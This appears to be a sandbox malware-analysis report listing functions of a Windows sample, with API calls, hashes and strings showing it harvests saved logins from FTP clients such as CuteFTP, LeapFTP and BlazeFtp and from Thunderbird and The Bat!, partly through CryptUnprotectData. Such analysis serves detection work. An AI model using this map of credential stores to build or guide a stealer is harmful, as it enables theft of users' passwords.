Opcode ID: 50a609664e81cea622340f05941c93683e1650f6c5f05debcd6013568c06ae2f
Instruction ID: 21aff8abfa636648981e863fbffbe30260a0c72b04b14aad0c6b52ef7d14ebbd
Opcode Fuzzy Hash: 50a609664e81cea622340f05941c93683e1650f6c5f05debcd6013568c06ae2f
Instruction Fuzzy Hash: D941F972D04209EAEF11AFA1CC05BEEBF79EF04349F10403AF510B52A1D7B95A56DB19

Uniqueness

Uniqueness Score: -1.00%

Function 0040D52A Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 108registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 0040D540
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D574
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D6F7

Strings

Pass, xrefs: 0040D5E8
User, xrefs: 0040D5CA
Remote Dir, xrefs: 0040D624
Port, xrefs: 0040D606
Host, xrefs: 0040D5AC

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: Host$Pass$Port$Remote Dir$User
API String ID: 1332880857-1775099961
Opcode ID: 80d1a0e8c1c8a423298d716e21dabcb31e230ccbb27751e2697dd51d03cf2139
Instruction ID: 7b223506985f7e9993881f89488d5220dd2ac385c586e2f2613014f328bb2d28
Opcode Fuzzy Hash: 80d1a0e8c1c8a423298d716e21dabcb31e230ccbb27751e2697dd51d03cf2139
Instruction Fuzzy Hash: 96419731940118BADF117B91DC02BDD7AB6BF44348F10C0BAB649740B1DF7A9B95AF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040C78D Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 101COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(006B2290,BlazeFtp), ref: 0040C7B4

Part of subcall function 004023B3: lstrlen.KERNEL32(?,?,00000000), ref: 004023C7
Part of subcall function 004023B3: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 004023E6
Part of subcall function 004023B3: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023F8
Part of subcall function 004023B3: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040240A

Part of subcall function 00401840: LocalFree.KERNEL32(00000000,?,00402C4E), ref: 0040184C

Strings

\BlazeFtp, xrefs: 0040C7FF
site.dat, xrefs: 0040C7CF, 0040C7FA
LastAddress, xrefs: 0040C828
LastUser, xrefs: 0040C842
LastPort, xrefs: 0040C85E
LastPassword, xrefs: 0040C80E
Software\FlashPeak\BlazeFtp\Settings, xrefs: 0040C813, 0040C82D, 0040C847, 0040C863
BlazeFtp, xrefs: 0040C7AE

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: BlazeFtp$LastAddress$LastPassword$LastPort$LastUser$Software\FlashPeak\BlazeFtp\Settings$\BlazeFtp$site.dat
API String ID: 1884169789-2976447346
Opcode ID: b909fb7a81e82e5df682445722ac9d9212a923162b23fabcc3bb23a564e12e57
Instruction ID: 86f57633c918004cb591647fbe494c1de5fca40327017356163d7bee477b7d32
Opcode Fuzzy Hash: b909fb7a81e82e5df682445722ac9d9212a923162b23fabcc3bb23a564e12e57
Instruction Fuzzy Hash: E531FC31940105FADF126BA5DC42FEE7A72AB80748F10813AB505751F1D77A9AA1AB4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040532D Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 69COMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI(006B2290,CUTEFTP), ref: 00405354

Part of subcall function 004023B3: lstrlen.KERNEL32(?,?,00000000), ref: 004023C7
Part of subcall function 004023B3: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 004023E6
Part of subcall function 004023B3: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023F8
Part of subcall function 004023B3: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040240A

Part of subcall function 00401840: LocalFree.KERNEL32(00000000,?,00402C4E), ref: 0040184C

Strings

Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar, xrefs: 004053E5
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar, xrefs: 004053D8
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar, xrefs: 004053BE
\sm.dat, xrefs: 00405368
CUTEFTP, xrefs: 0040534E
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar, xrefs: 004053B1
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar, xrefs: 004053CB
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar, xrefs: 004053F2

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: CUTEFTP$Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar$\sm.dat
API String ID: 1884169789-2738976122
Opcode ID: 990a038c71756545bbfcbf175bd01af30a517b02b1770d04a70bdb0593dbbc04
Instruction ID: 4af4e5b1d5efac7b425d03862d1557ab60b4bce52fbe80c0be0418ddd032b2c9
Opcode Fuzzy Hash: 990a038c71756545bbfcbf175bd01af30a517b02b1770d04a70bdb0593dbbc04
Instruction Fuzzy Hash: DA11ED31640909BADF127B61DC03FDE3E61EF40788F10457AB914780F2DBB98A919E8C

Uniqueness

Uniqueness Score: -1.00%

Function 00406CB9 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 121registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00406CCF
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406D03
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406EA4

Part of subcall function 00401840: LocalFree.KERNEL32(00000000,?,00402C4E), ref: 0040184C

Strings

Port, xrefs: 00406D9F
Username, xrefs: 00406D7C
Password, xrefs: 00406D40
Hostname, xrefs: 00406D5E

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CloseEnumFreeLocalOpen
String ID: Hostname$Password$Port$Username
API String ID: 3369285772-1811172798
Opcode ID: 76a297ae803e78fc5009afd27baac82bceae9e3d315fc6ba3098b49659398310
Instruction ID: 27c77d28138e57c2a30f99cccdabf8977cef2fc3a32f2554e889b233b07969ab
Opcode Fuzzy Hash: 76a297ae803e78fc5009afd27baac82bceae9e3d315fc6ba3098b49659398310
Instruction Fuzzy Hash: 0D410B3194011CEADF216B51CC01BDD7AB9BF44344F10C0BAB549740B1CF7A9BA19F98

Uniqueness

Uniqueness Score: -1.00%

Function 00406A85 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 110registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 00406A9B
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406ACF
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406C44

Part of subcall function 00401840: LocalFree.KERNEL32(00000000,?,00402C4E), ref: 0040184C

Strings

FtpPort, xrefs: 00406B66
Password, xrefs: 00406B07
Server, xrefs: 00406B25
Username, xrefs: 00406B43

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CloseEnumFreeLocalOpen
String ID: FtpPort$Password$Server$Username
API String ID: 3369285772-1828875246
Opcode ID: caab9b254be9c79d17985836d461de59f53e76dc8b9d2d38f31d2bcadcfba6e1
Instruction ID: 3286875724ba92266753070bf47cb5da6056a0bf67defb327aa2e9fe9a0f604f
Opcode Fuzzy Hash: caab9b254be9c79d17985836d461de59f53e76dc8b9d2d38f31d2bcadcfba6e1
Instruction Fuzzy Hash: 0341E971940118EADF217B91DC02BDD7AB9BF44344F14C0BAB549740B1CF7A9BA1AF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040E1A1 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 97registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E1B1
RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?,?,Folder,00000000,?,?,Port,00000000,?,?), ref: 0040E2E1

Part of subcall function 00404346: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 00404392
Part of subcall function 00404346: LocalFree.KERNEL32(00000000), ref: 004043C6

Part of subcall function 00401553: lstrlen.KERNEL32(00000000), ref: 0040155F

Strings

xflags, xrefs: 0040E1EC
Port, xrefs: 0040E201
Folder, xrefs: 0040E216
Site, xrefs: 0040E1C0
UserID, xrefs: 0040E1D5

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CloseCryptDataFreeLocalOpenUnprotectlstrlen
String ID: Folder$Port$Site$UserID$xflags
API String ID: 2167297517-269738940
Opcode ID: 19422a3692644d5846d23386d42f0614ed746a009e9e54ad14f287abc9c52d33
Instruction ID: 2bbafa08a87d1715754746c4693ba5e37664914531330f1544f8fdf4342e45a7
Opcode Fuzzy Hash: 19422a3692644d5846d23386d42f0614ed746a009e9e54ad14f287abc9c52d33
Instruction Fuzzy Hash: F0318A31944119BADF12AF96CC02BEE7B76BF04348F10847ABA15741F1C77A9A61EB48

Uniqueness

Uniqueness Score: -1.00%

Function 00407832 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407845
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407879
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407994

Strings

DataDir, xrefs: 004078CC
InstallPath, xrefs: 004078B1
sites.ini, xrefs: 0040790B, 00407944
sites.dat, xrefs: 004078F3, 0040792C

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DataDir$InstallPath$sites.dat$sites.ini
API String ID: 1332880857-3870687875
Opcode ID: b607c7218d273e235bee287dba754a438cc388fc63986edf39bc6145e0bc45a6
Instruction ID: c2f424ccbec97aba35c716fbdd499ad5300c54a28e64bab09e935c7b4cda2cb2
Opcode Fuzzy Hash: b607c7218d273e235bee287dba754a438cc388fc63986edf39bc6145e0bc45a6
Instruction Fuzzy Hash: C731C67194411DFADF11AB51CC02FDD7ABABF44344F10C4BAB644740A1CBB9AA91AF89

Uniqueness

Uniqueness Score: -1.00%

Function 0040F789 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 53COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040F7B7

Part of subcall function 00409BA6: StrStrIA.SHLWAPI(?,?), ref: 00409BB2
Part of subcall function 00409BA6: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409C29
Part of subcall function 00409BA6: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409C55
Part of subcall function 00409BA6: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409C9D

SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040F7FC
GetCurrentDirectoryA.KERNEL32(00000104,?,?,?), ref: 0040F817
SetCurrentDirectoryA.KERNEL32(?,?,?,?), ref: 0040F85C

Strings

Software\Mozilla, xrefs: 0040F7C6, 0040F7E3, 0040F826, 0040F843
\Thunderbird, xrefs: 0040F7BC, 0040F7D9, 0040F81C, 0040F839
Thunderbird, xrefs: 0040F7C1, 0040F7DE, 0040F821, 0040F83E

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: Software\Mozilla$Thunderbird$\Thunderbird
API String ID: 3062143572-138716004
Opcode ID: 323c0b8fe7e650e381a57aa7a469d6cabfb40a715b13c541e397debd312dd2a4
Instruction ID: f7a818ba144afe3988f6d5d1a30e7f029c99f2ebb97cea8546427059eb2b5726
Opcode Fuzzy Hash: 323c0b8fe7e650e381a57aa7a469d6cabfb40a715b13c541e397debd312dd2a4
Instruction Fuzzy Hash: 3E112E74684204BACB10AFA2DC47FD93B75AB04748F2084ABB644750E3D7FD9AD19B4C

Uniqueness

Uniqueness Score: -1.00%

Function 004079E9 Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 100stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(006B2290,unleap.exe), ref: 00407A1B
lstrlen.KERNEL32(unleap.exe,00000001,006B2290,unleap.exe), ref: 00407A34

Part of subcall function 004023B3: lstrlen.KERNEL32(?,?,00000000), ref: 004023C7
Part of subcall function 004023B3: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000), ref: 004023E6
Part of subcall function 004023B3: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 004023F8
Part of subcall function 004023B3: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000), ref: 0040240A

Part of subcall function 00401840: LocalFree.KERNEL32(00000000,?,00402C4E), ref: 0040184C

StrStrIA.SHLWAPI(006B25B0,leapftp,006B2290,unleap.exe), ref: 00407A78

Strings

unleap.exe, xrefs: 00407A15, 00407A2F
SOFTWARE\LeapWare, xrefs: 00407AEE, 00407B01
leapftp, xrefs: 00407A72
sites.ini, xrefs: 00407A5D, 00407AA2
sites.dat, xrefs: 00407A49, 00407A8E

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: lstrlen$FreeLocal
String ID: SOFTWARE\LeapWare$leapftp$sites.dat$sites.ini$unleap.exe
API String ID: 1884169789-1497043051
Opcode ID: 980a2e6b94e9ad0189f352591ddbad2366ceabc1c20bda3e702ad34cad73ce1c
Instruction ID: d6484a80ca3a95d74444ee2f97a37d77460b90fcf7660b27fdc1b4f5ea77e9e1
Opcode Fuzzy Hash: 980a2e6b94e9ad0189f352591ddbad2366ceabc1c20bda3e702ad34cad73ce1c
Instruction Fuzzy Hash: B121C570A04104BAEB113B31CC06FEE3E59ABC1744F20403BB904B51E2D7BD6E9196AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040EED6 Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 00401840: LocalFree.KERNEL32(00000000,?,00402C4E), ref: 0040184C

wsprintfA.USER32 ref: 0040EFAB

Strings

Software\RIT\The Bat!, xrefs: 0040EEE3, 0040EF11
Dir #%d, xrefs: 0040EFA2
Count, xrefs: 0040EF6A
Default, xrefs: 0040EF3A
ProgramDir, xrefs: 0040EF0C
Software\RIT\The Bat!\Users depot, xrefs: 0040EF3F, 0040EF6F, 0040EFBB
Working Directory, xrefs: 0040EEDE

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: FreeLocalwsprintf
String ID: Count$Default$Dir #%d$ProgramDir$Software\RIT\The Bat!$Software\RIT\The Bat!\Users depot$Working Directory
API String ID: 988369812-1921698578
Opcode ID: 5a964b982966c428b87894e531f1a1fea3a43d0966c5195dbdc2028882686e59
Instruction ID: 4784d8f210aec7d8ae8286e4dc0b6a4445b2fc317a01857379e7b1a9fb786f93
Opcode Fuzzy Hash: 5a964b982966c428b87894e531f1a1fea3a43d0966c5195dbdc2028882686e59
Instruction Fuzzy Hash: 5A31ED31940209FBDF11ABA2DC42ADE7A75AF00744F20887BF514B51E1DB799B60AB48

Uniqueness

Uniqueness Score: -1.00%

Function 00404BBB Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 00401857: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BFC,00000000), ref: 00401865

GetWindowsDirectoryA.KERNEL32(?,00000104,00000105), ref: 00404BE5

Strings

Software\Ghisler\Windows Commander, xrefs: 00404C7E, 00404C9E, 00404D20, 00404D3F
FtpIniName, xrefs: 00404C99, 00404CEA, 00404D3A, 00404D89
Software\Ghisler\Total Commander, xrefs: 00404CCF, 00404CEF, 00404D6F, 00404D8E
InstallDir, xrefs: 00404C79, 00404CCA, 00404D1B, 00404D6A
\GHISLER, xrefs: 00404C25, 00404C44, 00404C63

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: AllocDirectoryLocalWindows
String ID: FtpIniName$InstallDir$Software\Ghisler\Total Commander$Software\Ghisler\Windows Commander$\GHISLER
API String ID: 3186838798-3636168975
Opcode ID: 13010d47b2780862f12abacb2e686663d96792badc841982bec806e383a15c07
Instruction ID: f7871ea3d4240a9e3ba7bd5f46dda144531476c67df709ceb90a832ffc830c87
Opcode Fuzzy Hash: 13010d47b2780862f12abacb2e686663d96792badc841982bec806e383a15c07
Instruction Fuzzy Hash: 1141D074E80508BAEF127BA2CC07FED7A699F90748F11813F7A04741F2CABD99509A5C

Uniqueness

Uniqueness Score: -1.00%

Function 00404885 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?), ref: 0040489B
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004048CF
RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004049F6

Strings

Password, xrefs: 00404907
User, xrefs: 00404943
HostName, xrefs: 00404925

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: HostName$Password$User
API String ID: 1332880857-1253078594
Opcode ID: 6113d21654f3104bb46cbf4d82035a399164de67f8c9261a7bdc1784f9249a68
Instruction ID: 0df7185746bdd5bc412cedecf3d61c71ab4e3b4de0fdac9e9948e631594cfb2d
Opcode Fuzzy Hash: 6113d21654f3104bb46cbf4d82035a399164de67f8c9261a7bdc1784f9249a68
Instruction Fuzzy Hash: 5C31C871940118BADF217B61DC42BDD7ABABF40348F10C0BAB649741B1CB795B92AF98

Uniqueness

Uniqueness Score: -1.00%

Function 00408D77 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408D8A
RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408DBE
RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408EB0

Strings

wiseftpsrvs.bin, xrefs: 00408E66
wiseftpsrvs.ini, xrefs: 00408E36
wiseftp.ini, xrefs: 00408E4E

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: wiseftp.ini$wiseftpsrvs.bin$wiseftpsrvs.ini
API String ID: 1332880857-3184955129
Opcode ID: 4d6e70b4ab50bc67791a00e1b25179a0773e3a4a363494b9b96d6e41787a4268
Instruction ID: d3478e2a471555fe06b631a4cc13415ba238c64a6c4b1044b2d174fd7e034d7c
Opcode Fuzzy Hash: 4d6e70b4ab50bc67791a00e1b25179a0773e3a4a363494b9b96d6e41787a4268
Instruction Fuzzy Hash: 2531187190011DBACF11AF61CC02FDE7ABABF00344F10C5BAB644B40E1CE799A91AF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040A7DF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

756FE550.OLE32(004162F2,00000000,00000005,00416302,?), ref: 0040A7F7
StrStrIW.SHLWAPI(00000000,00416322), ref: 0040A86E
757283B0.OLE32(00000000,00000000,00416322), ref: 0040A899
757283B0.OLE32(00000000,00000000,00000000,00416322), ref: 0040A8A7

Strings

(, xrefs: 0040A833
http://www.facebook.com/, xrefs: 0040A8C6

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: 757283$E550
String ID: ($http://www.facebook.com/
API String ID: 1310012808-3677894361
Opcode ID: 9a7c5c0daee02aeb3aa0a651ff1e1b5389b763415f787bff53803292f13218b0
Instruction ID: 07647751d7e6e847d4d03b9b2cf335b733e0ef860eb9b9f2d0ca62f1729122c7
Opcode Fuzzy Hash: 9a7c5c0daee02aeb3aa0a651ff1e1b5389b763415f787bff53803292f13218b0
Instruction Fuzzy Hash: C5314971900208FBDF00EF90CC85BCEFBB5BF04304F208166E500B62A0D7799A96DB99

Uniqueness

Uniqueness Score: -1.00%

Function 00409D35 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409D92
SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409DD7

Part of subcall function 00401DD4: lstrlen.KERNEL32(?,?,?,00402121,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00414878,004103E4,00000000,?,00000FFF,00000000,00000000,00000000,00000000), ref: 00401DF5
Part of subcall function 00401DD4: lstrlen.KERNEL32(?,?,?,?,00402121,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00414878,004103E4,00000000,?,00000FFF,00000000,00000000,00000000), ref: 00401DFF
Part of subcall function 00401DD4: lstrcpy.KERNEL32(00000000,?), ref: 00401E13
Part of subcall function 00401DD4: lstrcat.KERNEL32(00000000,?), ref: 00401E1C

Part of subcall function 00401840: LocalFree.KERNEL32(00000000,?,00402C4E), ref: 0040184C

Strings

Software\Mozilla, xrefs: 00409DA1, 00409DBE
fireFTPsites.dat, xrefs: 00409D69
Firefox, xrefs: 00409D9C, 00409DB9
\Mozilla\Firefox\, xrefs: 00409D58, 00409D97, 00409DB4

Memory Dump Source

Source File: 00000000.00000002.1635081490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1635057083.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635121114.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1635143318.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_820.jbxd

Yara matches

Similarity

API ID: CurrentDirectorylstrlen$FreeLocallstrcatlstrcpy
